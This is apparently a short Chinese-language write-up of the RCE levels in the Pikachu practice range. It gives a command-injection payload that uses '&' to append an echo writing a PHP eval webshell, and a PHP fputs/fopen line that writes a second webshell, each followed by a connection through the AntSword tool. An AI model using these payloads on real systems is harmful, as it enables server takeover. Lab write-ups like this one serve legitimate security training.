Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
我是小超人-雨石花2 小时前
Jenkins&Robot Framework持续集成
运维·jenkins·ci
wanhengidc4 小时前
云手机的软件核心是什么
运维·服务器·web安全·游戏·智能手机
芬加达4 小时前
jvm八股
运维·服务器·jvm
小兔薯了5 小时前
11. Linux firewall 防火墙管理
linux·运维·服务器
ink@re6 小时前
Docker环境搭建与容器管理实战:从部署到编排的完整指南
运维·docker·容器
q***7486 小时前
数据库高安全—openGauss安全整体架构&安全认证
数据库·安全·架构
RPA机器人就选八爪鱼6 小时前
RPA财务机器人:驱动财务数字化转型的核心引擎
大数据·运维·人工智能·机器人·rpa
二川bro6 小时前
第54节:安全防护 - 3D场景中的XSS防御
安全·3d·xss
-大头.7 小时前
Redis内存碎片深度解析:从动态整理到核心运维实践
运维·数据库·redis
倦王7 小时前
Linux看ip,改用户名字加权限,在单独用户下设置miniconda
linux·服务器·tcp/ip